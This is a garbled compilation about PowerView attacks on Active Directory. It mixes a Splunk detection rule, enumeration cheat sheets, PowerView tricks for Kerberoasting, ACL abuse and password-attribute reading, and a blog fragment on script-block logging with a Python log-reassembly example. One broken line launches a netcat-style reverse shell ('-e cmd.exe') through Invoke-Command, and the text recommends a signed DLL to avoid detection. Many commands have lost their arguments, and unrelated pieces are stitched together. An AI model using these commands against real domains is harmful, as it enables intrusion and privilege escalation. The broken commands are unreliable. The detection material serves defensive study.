Crossing the domain with PowerView in Active Directory

Introduction

I know this is a lot, but bear with me as I tell you the whole story. If you are only interested in the juicy part, you can skip to ‘The case of split “PowerVi/ew”’.


Description

  • Type: TTP
  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Last Updated: 2024-05-18
  • Author: Mauricio Velazco, Splunk
  • ID: a44c0be1-d7ab-41e4-92fd-aa9af4fe232c

Annotations

ATT&CK

| ID | Technique | Tactic |
|---|---|---|
| T1135 | Network Share Discovery | Discovery |

Kill Chain Phase
  • Exploitation
NIST
  • DE.CM
CIS20
  • CIS 10
CVE

`powershell` EventCode=4104  (ScriptBlockText=Invoke-ShareFinder*) 
| stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText 
| `security_content_ctime(firstTime)` 
| `security_content_ctime(lastTime)` 
| `windows_file_share_discovery_with_powerview_filter`

Macros

Required fields

List of fields required to use this analytic.

  • _time
  • EventCode
  • ScriptBlockText
  • Opcode
  • Computer
  • UserID

How To Implement

Known False Positives

Associated Analytic Story

RBA

| Risk Score | Impact | Confidence | Message |
|---|---|---|---|
| 48.0 | 60 | 80 | Invoke-ShareFinder commandlet was executed on $Computer$ |

Reference

Test Dataset

Replay any dataset to Splunk Enterprise by using our replay.py tool or the UI.
Alternatively, you can replay a dataset into a Splunk Attack Range.


The most up-to-date version of PowerView will always be in the dev branch of PowerSploit: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

SharpView is a .NET port of PowerView.

#Basic domain info
#Get all domain trusts (parent, children and external)
#Find interesting ACLs

# Domain Info
#Get info about the current domain
#Get info about the current domain

#Get domain SID
#Get info about the policy
#Kerberos tickets info(MaxServiceAge)

#Check your privileges
# Same as Get-DomainPolicy
# Domain Controller
#Get all info of a specific Domain Controller
# Get Forest info 


## Get-DomainGroup is similar to Get-NetGroup 

#Get groups of a specific domain
#Get restricted groups
# Get all domain names of computers
## Get-DomainComputer is kind of the same as Get-NetComputer
#Get all computer objects
#Send a ping to check if the computers are working
#DCs always appear but aren't useful for privesc
#Find computers with Constrained Delegation
## Get-DomainOU is kind of the same as Get-NetOU
#Get Organization Units

Logon and Sessions

#Get active sessions on the host

Group Policy Object – GPOs

#Get all policies with details
#Get the policy applied in a computer
#Get current policy
# Get who can create new GPOs
# Convert GPO GUID to name

# Transform SID to name
# Get GPO of an OU
# Returns all GPOs that modify local group memberships through Restricted Groups or Group Policy Preferences.

Learn how to exploit permissions over GPOs and ACLs in:

Abusing Active Directory ACLs/ACEs

#Get ACLs of an object (permissions of other objects over the indicated one)
#Another way to get ACLs of an object
#Get permissions of a file

#Find interesting ACEs (interesting permissions of "unexpected objects" (RID>1000 and modify permissions) over other objects)

#Get all domain trusts (parent, children and external)
#Enumerate also all the trusts
# Get basic forest info
#Get info of current forest (no external)
#Get info about the external forest (if possible)
Get-NetForestTrust #Get forest trusts (it must be between 2 roots, trust between a child and a root is just an external trust)
#Get groups with privileges in other domains inside the forest

# for all the targeted machines on the current (or specified) domain.

#This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft
#You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects
'isDeleted -eq $true'

SID to Name

Use different credentials (argument)

# use an alternate credential for any function


# if running in -sta mode, impersonate another credential a la "runas /netonly"


# Set the owner of 'dfm' in the current domain to 'harmj0y'


PowerView is a PowerShell script to perform common Active Directory enumeration and exploitation tasks. This article lists some common PowerView enumeration commands.

You can obtain a copy of PowerView here: https://github.com/ZeroDayLab/PowerSploit/blob/master/Recon/PowerView.ps1

There is also a .NET port of PowerView, called SharpView, in case usage of PowerShell isn't an option. This can be downloaded here: https://github.com/tevora-threat/SharpView


ADModule

In addition to PowerView commands, I’ve also listed the equivalent commands using Microsoft.ActiveDirectory.Management.dll.

The benefit of this approach over PowerView is we’re using a Microsoft signed executable, which reduces our chance of getting detected on disk. Unfortunately, the DLL can’t perform all the tasks that PowerView can.

A copy of this DLL can be obtained here: https://github.com/samratashok/ADModule

Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

PowerView Commands

Domain Information

| PowerView Command | ADModule | Purpose |
|---|---|---|
| Get-Domain | Get-ADDomain | Find the current domain |
| Get-DomainSID | (Get-ADDomain).DomainSID | Find the current domain's SID |
| Get-DomainPolicyData | (Get-DomainPolicyData).systemaccess | Returns the default domain policy or the domain controller policy for the current domain |
| Get-DomainController | Get-ADDomainController | Find the current domain controllers |
| Get-DomainOU | Get-ADOrganizationalUnit -Filter * -Properties * | List organisational units in the domain |

Enumerating Users, Groups & Computers

| PowerView Command | ADModule | Purpose |
|---|---|---|
| Get-DomainUser \| select samaccountname | Get-ADUser -Filter * -Properties * | List users in current domain |
| Get-DomainComputer | Get-ADComputer -Filter * \| select Name | List computers in the domain |
| Get-DomainGroup \| select Name | Get-ADGroup -Filter * \| select Name | List groups in the domain |
| Get-DomainGroupMember -Identity "Domain Admins" -Recurse | Get-ADGroupMember -Identity "Domain Admins" -Recursive | Find members of the domain admin group |
| Get-NetLocalGroup -ComputerName Computer1 -ListGroups | | List local groups on a remote computer (requires admin privileges) |

Domain Trust Enumeration

| PowerView Command | ADModule | Purpose |
|---|---|---|
| Get-NetDomainTrust | Get-ADDomain | Get trusts for the current domain |
| Get-NetForest | Get-ADForest | List forest details |
| Get-NetForestDomain | | List all domains in forest |
| Get-NetForestTrust | | Map forest trusts |

Share Enumeration

| PowerView Command | Purpose |
|---|---|
| Get-NetShare -ComputerName sqlserver | List shares on a machine |
| Invoke-ShareFinder | Search for shares on the network |
| Invoke-FileFinder | Search for files on the network |
| Get-NetFileServer | List file servers in the domain |

User Hunting

| PowerView Command | Purpose |
|---|---|
| Get-NetLoggedonLocal -ComputerName Computer1 | Find logged-in users using the remote registry service (which is started by default on Windows Server). Does not require admin privileges. |
| Invoke-UserHunter -CheckAccess | Check if domain administrators are logged into workstations |

GPO Enumeration

| PowerView Command | Purpose |
|---|---|
| Get-DomainGPO | List group policy objects in a domain |
| Get-DomainGPOLocalGroup | Returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' or Group Policy preferences |

ACL Enumeration

| PowerView Command | Purpose |
|---|---|
| Get-DomainObjectAcl -SamAccountName test -ResolveGUIDs | Get the ACL of a specific object |
| Find-InterestingDomainAcl -ResolveGUIDs | Find interesting domain ACLs |

Kerberos Delegation

| PowerView Command | Purpose |
|---|---|
| Get-DomainComputer -Unconstrained | Check for unconstrained delegation hosts |
| Get-DomainUser -TrustedToAuth | Check for constrained delegation hosts |

Automating PowerView ACL Enumeration

Function Invoke-ACLChecks {
    # Identity to compare ACEs against, in the DOMAIN\user form that ConvertFrom-SID returns
    $Me = "$env:UserDomain\$env:UserName"

    # Pull the ACLs of every user and group object, resolve each ACE's SID to a name,
    # and keep only the ACEs held by the current user (computed once, filtered per check)
    $MyAces = @(Get-DomainUser; Get-DomainGroup) | Get-ObjectAcl -ResolveGUIDs |
        ForEach-Object { $_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_ } |
        Where-Object { $_.Identity -eq $Me }

    Write-Host "Checking for GenericAll ACEs"
    $MyAces | Where-Object { $_.ActiveDirectoryRights -match 'GenericAll' }

    Write-Host "Checking for WriteDacl ACEs"
    $MyAces | Where-Object { $_.ActiveDirectoryRights -match 'WriteDacl' }

    Write-Host "Checking for unconstrained delegation"
    Get-DomainComputer -Unconstrained

    Write-Host "Checking for constrained delegation"
    Get-DomainUser -TrustedToAuth

    Write-Host "Checks done"
}


 

   
  
        
Get-DomainGroup -MemberIdentity adunn | select name

Recursive Group Membership

   

Get-DomainGroupMember function will retrieve group-specific information. Adding the -Recurse switch tells PowerView that if it finds any groups that are part of the target group (nested group membership) to list out the members of those groups.

  
   

Check for users with the SPN attribute set, which indicates that the account may be subjected to a Kerberoasting attack.

Import-Module .\PowerView.ps1

  
  
  ConvertTo-SecureString  -AsPlainText -Force
  New-Object System.Management.Automation.PSCredential , 
Invoke-Command -ComputerName :computername -Credential  -ScriptBlock C:netpubwwrootc.exe -nd .168.45.5  -e cmd.exe

Commands

| Command | Description |
|---|---|
| Export-PowerViewCSV | Append results to a CSV file |
| ConvertTo-SID | Convert a User or group name to its SID value |
| Get-DomainSPNTicket | Requests the Kerberos ticket for a specified Service Principal Name (SPN) account |
| Domain/LDAP Functions | |
| Get-Domain | Will return the AD object for the current (or specified) domain |
| Get-DomainController | Return a list of the Domain Controllers for the specified domain |
| Get-DomainUser | Will return all users or specific user objects in AD |
| Get-DomainComputer | Will return all computers or specific computer objects in AD |
| Get-DomainGroup | Will return all groups or specific group objects in AD |
| Get-DomainOU | Search for all or specific OU objects in AD |
| Find-InterestingDomainAcl | Finds object ACLs in the domain with modification rights set to non-built-in objects |
| Get-DomainGroupMember | Will return the members of a specific domain group |
| Get-DomainFileServer | Returns a list of servers likely functioning as file servers |
| Get-DomainDFSShare | Returns a list of all distributed file systems for the current (or specified) domain |
| GPO Functions | |
| Get-DomainGPO | Will return all GPOs or specific GPO objects in AD |
| Get-DomainPolicy | Returns the default domain policy or the domain controller policy for the current domain |
| Computer Enumeration Functions | |
| Get-NetLocalGroup | Enumerates local groups on the local or a remote machine |
| Get-NetLocalGroupMember | Enumerates members of a specific local group |
| Get-NetShare | Returns open shares on the local (or a remote) machine |
| Get-NetSession | Will return session information for the local (or a remote) machine |
| Test-AdminAccess | Tests if the current user has administrative access to the local (or a remote) machine |
| Threaded 'Meta'-Functions | |
| Find-DomainUserLocation | Finds machines where specific users are logged in |
| Find-DomainShare | Finds reachable shares on domain machines |
| Find-InterestingDomainShareFile | Searches for files matching specific criteria on readable shares in the domain |
| Find-LocalAdminAccess | Find machines on the local domain where the current user has local administrator access |
| Domain Trust Functions | |
| Get-DomainTrust | Returns domain trusts for the current domain or a specified domain |
| Get-ForestTrust | Returns all forest trusts for the current forest or a specified forest |
| Get-DomainForeignUser | Enumerates users who are in groups outside of the user's domain |
| Get-DomainForeignGroupMember | Enumerates groups with users outside of the group's domain and returns each foreign member |
| Get-DomainTrustMapping | Will enumerate all trusts for the current domain and any others seen |

Script location

new version

wget https://raw.githubusercontent.com/BC-SECURITY/Empire/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1

old version

local on kali

from github fork

PowerView-3.0-tricks.ps1

# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set
#       Add : add a new object to a destination
#       Set : modify a given object
#       Invoke : lazy catch-all
#   Nouns:
#       Verb-Domain* : indicates that LDAP/.NET querying methods are being executed
#       Verb-WMI* : indicates that WMI is being used under the hood to execute enumeration
#       Verb-Net* : indicates that Win32 API access is being used under the hood



Get-DomainGroup -MemberIdentity <User/Group>

# get all the effective members of a group, 'recursing down'
Get-DomainGroupMember -Identity <group> -Recurse

# use an alternate credential for any function ($SecPassword and $Cred are placeholder names)
$SecPassword = ConvertTo-SecureString '<password>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN\user>', $SecPassword)
Get-DomainUser -Credential $Cred

# retrieve all the computer dns host names a GPP password applies to
Get-DomainOU -GPLink <GPO GUID> | % { Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname }


  Get-Date.AddYears-1.ToFileTime
Get-DomainUser -LDAPFilter  -Properties samaccountname,pwdlastset


Get-DomainUser -LDAPFilter  -Properties distinguishedname
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname


Get-DomainUser -LDAPFilter 
Get-DomainUser -UACFilter ACCOUNTDISABLE


Get-DomainUser -LDAPFilter 
Get-DomainUser -UACFilter SMARTCARD_REQUIRED


Get-DomainUser -LDAPFilter  -Properties samaccountname
Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname

# use multiple identity types for any *-Domain* function
, ,,  Get-DomainUser -Properties samaccountname,lastlogoff


Get-DomainUser -SPN


Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH


Get-DomainUser -SPN  ?.memberof -match 


Get-DomainUser -LDAPFilter 


Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth


  Get-DomainComputer -Unconstrained
  Get-DomainUser -AllowDelegation -AdminCount

# return the local *groups* of a remote server
Get-NetLocalGroup SERVER.domain.local

# return the local group *members* of a remote server using Win32 API methods (faster but less info)
Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local


Invoke-Kerberoast -SearchBase 



Find-DomainUserLocation -ComputerUnconstrained -ShowAll


Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation

# find all computers in a given OU
Get-DomainComputer -SearchBase 


Get-DomainOU -Identity *server* -Domain <domain>  %Get-DomainComputer -SearchBase .distinguishedname -Properties dnshostname  %Get-NetLoggedOn -ComputerName 

# enumerate all global catalogs in the forest
Get-ForestGlobalCatalog

# turn a list of computer short names to FQDNs, using a global catalog
gc computers.txt  % Get-DomainComputer -SearchBase  -LDAP  -Properties dnshostname

# enumerate the current domain controller policy ($DCPolicy is a placeholder name)
$DCPolicy = Get-DomainPolicy -Policy DC
$DCPolicy.PrivilegeRights

# enumerate the current domain policy ($DomainPolicy is a placeholder name)
$DomainPolicy = Get-DomainPolicy -Policy Domain
$DomainPolicy.KerberosPolicy # useful for golden tickets ;)
$DomainPolicy.SystemAccess # password age/etc.



Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>


Get-DomainGPOUserLocalGroupMapping -Identity <USER> -Domain <DOMAIN> -LocalGroup RDP

# export a csv of all GPO mappings
Get-DomainGPOUserLocalGroupMapping  %.computers  .computers -join    Export-CSV -NoTypeInformation gpo_map.csv

# use alternate credentials for searching for files on the domain ($SecPassword and $Cred are placeholder names)
$SecPassword = ConvertTo-SecureString '<password>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN\user>', $SecPassword)
Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Cred


Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local


Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose


Get-DomainObjectAcl -SearchBase  -ResolveGUIDs


Add-DomainObjectAcl -TargetIdentity  -PrincipalIdentity matt -Rights All


Get-DomainObjectAcl  -ResolveGUIDs  ? 
    .ObjectType -match  -or .ActiveDirectoryRights -match 


# find linked DA accounts using name correlation
Get-DomainGroupMember   %Get-DomainUser .membername -LDAPFilter   %.displayname.split..1 -join  Get-DomainUser -LDAPFilter  -Properties displayname,samaccountname

# save a PowerView object to disk for later usage ($Users is a placeholder name)
Get-DomainUser | Export-Clixml user.xml
$Users = Import-Clixml user.xml

# Find any machine accounts in privileged groups
Get-DomainGroup -AdminCount  Get-DomainGroupMember -Recurse  ?.MemberName -like 


Get-DomainObjectAcl -LDAPFilter   ?  .SecurityIdentifier -match  -and .ActiveDirectoryRights -match 

# find all policies applied to a current machine
Get-DomainGPO -ComputerIdentity windows1.testlab.local

# enumerate all groups in a domain that don't have a global scope, returning just group names
Get-DomainGroup -GroupScope NotGlobal -Properties name


#   query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames
  Get-DomainObject -Properties objectsid,distinguishedname -SearchBase  -LDAPFilter   ? .objectsid -match   Select-Object -ExpandProperty distinguishedname
  @
  ForEach   
    
      .SubString.IndexOf -replace , -replace ,
    # check if we've already enumerated this domain
     -not  
          
        # enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set
           +  -join  + 
        Get-DomainGroup -Domain  -Scope DomainLocal -LDAPFilter  -Properties distinguishedname,member
    

  fl

# if running in -sta mode, impersonate another credential a la "runas /netonly" ($SecPassword and $Cred are placeholder names)
$SecPassword = ConvertTo-SecureString '<password>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN\user>', $SecPassword)
Invoke-UserImpersonation -Credential $Cred

Invoke-RevertToSelf

# enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the first result returned by Get-DomainComputer
Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier


Set-DomainObject testuser -Set @ -Verbose

# Set the owner of 'dfm' in the current domain to 'harmj0y'
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y


Get-ObjectACL  -ResolveGUIDs  ? 
    .ActiveDirectoryRights -match  -or .ObjectAceType -match 



-1Get-DomainUser -LDAPFilter  -Properties samaccountname,memberof,userPassword  % Add-Member -InputObject  NoteProperty  System.Text.Encoding::ASCII.GetString.userPassword -PassThru  fl

More script blocks -> Fewer alerts??

| Rule / Run (#Blocks) | 9 (#39) | 10 (#47) | 4 (#49) | 1 (#54) | 7 (#55) | 3 (#57) | 6 (#57) | 5 (#64) | 8 (#69) | 2 (#76) | AVG |
|---|---|---|---|---|---|---|---|---|---|---|---|
| Total | 79 | 91 | 94 | 103 | 99 | 106 | 107 | 110 | 119 | 126 | 103.4 |
| Execute Invoke-command on Remote Host | 5 | 6 | 6 | 6 | 6 | 7 | 6 [2] | 7 | 7 | 7 | 6.3 |
| Malicious PowerShell Commandlets – ScriptBlock | 35 | 42 | 43 | 49 | 46 | 51 | 51 | 53 | 58 | 61 | 48.9 |
| Malicious PowerShell Keywords | 3 | 2 | 2 | 2 | 2 | 2 | 3 | 2 | 3 | 2 | 2.3 |
| Manipulation of User Computer or Group Security Principals Across AD | 4 | 4 | 4 | 6 [3] | 4 | 4 | 4 | 4 | 4 | <5> | 4.3 |
| Potential In-Memory Execution Using Reflection.Assembly | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 |
| Potential Suspicious PowerShell Keywords | 1 [1] | 2 | 2 | 2 | 2 | 2 | 2 | 2 | 2 | 2 | 1.9 |
| PowerView PowerShell Cmdlets – ScriptBlock | 27 | 30 | 32 | 34 | 35 | 35 | 36 | 38 | 40 | 45 | 35.2 |
| Request A Single Ticket via PowerShell | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | <2> (+1 because of script block cut-off) | 1 | 1.1 |
| Usage Of Web Request Commands And Cmdlets – ScriptBlock | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 |

First, let’s look at some results that were expected.

Okay, so these results are kind of expected and not too bad. So we should be fine, right?

The case of split “PowerVi/ew”

Add-Member Noteproperty 'Comment' $Info.lgrpi1_comment\n
$LocalGroup.PSObject.TypeNames.Insert(0, 'PowerVi

ew.LocalGroup.API')\n

The Uncertainty of Script Block Logging

| Run | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 |
|---|---|---|---|---|---|---|---|---|---|---|
| # Blocks | 54 | 76 | 57 | 49 | 64 | 57 | 55 | 69 | 39 | 47 |

More script blocks -> More alerts?

| Blocks | 39 | 47 | 49 | 54 | 55 | 57 | 57 | 64 | 69 | 76 |
|---|---|---|---|---|---|---|---|---|---|---|
| Alarms | 79 | 91 | 94 | 103 | 99 | 106 | 107 | 110 | 119 | 126 |
| … raised on … blocks | 39 | 46 | 48 | 53 | 53 | 56 | 56 | 60 | 65 | 70 |

Conclusion

Is there a remedy? Maybe re-combining script fragments (like this) to run detection mechanisms on the reconstructed scripts?
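The reassembly the conclusion asks about, as an added example in Python that is not part of the original post or of PowerView: it stitches Event ID 4104 fragments back together by ScriptBlockId and MessageNumber (the sample events are constructed), then runs the same kind of keyword rules the Splunk Invoke-ShareFinder search and the alert table rely on against the raw fragments and against the reassembled script, so the split "PowerVi/ew" case is visible. The field names follow Event ID 4104; the rule set, sample text and function names are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample 4104 events (not real logs). Script block "a1" was logged
# in three fragments, with "PowerView" cut across fragments 2 and 3; the
# fragments also arrive out of order, as they can in a SIEM.
SAMPLE_EVENTS = [
    {"Computer": "ws01.lab.local", "UserID": "S-1-5-21-1-1-1-1105", "ScriptBlockId": "a1",
     "MessageNumber": 1, "MessageTotal": 3,
     "ScriptBlockText": "function Get-NetShare {\n  param($ComputerName)\n"},
    {"Computer": "ws01.lab.local", "UserID": "S-1-5-21-1-1-1-1105", "ScriptBlockId": "a1",
     "MessageNumber": 3, "MessageTotal": 3,
     "ScriptBlockText": "ew.ShareInfo')\n}\nInvoke-ShareFinder -CheckShareAccess\n"},
    {"Computer": "ws01.lab.local", "UserID": "S-1-5-21-1-1-1-1105", "ScriptBlockId": "a1",
     "MessageNumber": 2, "MessageTotal": 3,
     "ScriptBlockText": "  $Share.PSObject.TypeNames.Insert(0, 'PowerVi"},
    {"Computer": "dc01.lab.local", "UserID": "S-1-5-21-1-1-1-500", "ScriptBlockId": "b2",
     "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running'\n"},
]

# Two keyword rules in the spirit of the page: the Splunk Invoke-ShareFinder
# search and a plain "PowerView" marker match (assumed rule set).
RULES = {
    "Invoke-ShareFinder": re.compile(r"Invoke-ShareFinder", re.I),
    "PowerView marker": re.compile(r"PowerView", re.I),
}


def reassemble(events):
    """Group 4104 events by ScriptBlockId and join the text in MessageNumber order.

    Returns {ScriptBlockId: {"text", "complete", "Computer", "UserID"}}; "complete"
    is False while fragments are still missing, so a consumer can decide to wait.
    """
    chunks, meta = defaultdict(dict), {}
    for ev in events:
        chunks[ev["ScriptBlockId"]][ev["MessageNumber"]] = ev["ScriptBlockText"]
        meta[ev["ScriptBlockId"]] = (ev["Computer"], ev["UserID"], ev["MessageTotal"])
    blocks = {}
    for sbid, parts in chunks.items():
        computer, user, total = meta[sbid]
        blocks[sbid] = {
            "text": "".join(parts[n] for n in sorted(parts)),
            "complete": set(parts) == set(range(1, total + 1)),
            "Computer": computer, "UserID": user,
        }
    return blocks


def match_fragments(events):
    """Hits when each fragment is matched on its own (what a ScriptBlockText rule sees)."""
    return {(ev["ScriptBlockId"], name) for ev in events
            for name, rx in RULES.items() if rx.search(ev["ScriptBlockText"])}


def match_reassembled(events):
    """Hits after the fragments are stitched back into whole script blocks."""
    return {(sbid, name) for sbid, blk in reassemble(events).items()
            for name, rx in RULES.items() if rx.search(blk["text"])}
```

On the sample, per-fragment matching finds only Invoke-ShareFinder, while the reassembled block also trips the PowerView marker; Computer and UserID are carried along so the hit can still be grouped the way the Splunk `stats ... by Computer UserID` clause does.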
